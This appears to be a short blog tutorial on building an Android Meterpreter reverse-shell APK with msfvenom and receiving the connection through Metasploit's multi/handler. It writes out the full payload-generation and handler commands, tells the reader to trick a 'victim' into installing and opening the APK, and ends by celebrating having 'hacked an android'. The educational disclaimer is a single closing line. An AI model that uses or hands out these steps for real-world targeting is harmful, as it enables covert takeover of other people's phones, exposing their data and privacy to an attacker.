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Hey guys!! Today, I am gonna explain you how to create a Payload using Kali Linux Terminal.

In this tutorial, we are going to use the best and wellknown framework. I hope you guess it, Yes! that is  Metasploit Framework. It is one of the best framework among all the frameworks.

What is Metasploit Framework ?

The Metasploit Framework is an open source penetration testing and development platform that provides exploits for a variety of applications, operating systems and platforms. Metasploit is one of the most commonly used penetration testing tools and comes built-in to Kali Linux.   


1. Pc with Kali Linux installed in it.   

Lets get started:

1. Now open your Kali Linux Terminal !
2. Use the following Command to create a payload using Metasploit:

    sudo msfvenom -p android/meterpreter/reverse_tcp                    LHOST= LPORT=4444 R>payload.apk  
    (There is no new line in this command)


  • -p = It means we're creating a payload
  • LHOST = your ip address [if you dont know your ip adress, type sudo ifconfig then copy the ipv4 and paste at LHOST]
  • LPORT = we have to use 4444 port because that port is not specifed.
  • Payload = payload.apk is the name of the your apk
    So after entering this command the payload will be created in your Desktop

3. You need to send this apk to the victim and this depends on you how  creatively you send this payload to the victim and make him install and open it!!

4. Now you need to access that apk for that open new terminal and type the following commands 
(NOTE:This process should be done after opening the apk by the victim)
 (type the commands one by one dont type all at once) we will access our created payload by the following command

use exploit/multi/handler

5. We'll have to setup our payload by typing 
  > set payload android/meterpreter/reverse_tcp


6. Now set some options like LHOST and LPORT
 > set LHOST <your ip> 

> set LPORT 4444

7. Now type:

8. You will get meterpreter connection from the victim. Here you will get the access over that android.

10. If u dont know commands type ?  so now you  get lots of commands 
11. Here is demonstration. I will try with a command to check the root.

HOORAY!! You have hacked an android using payload !!

NOTE: This post in only for Educational process. Dont misuse it !!! 

Author :- Sandeep  


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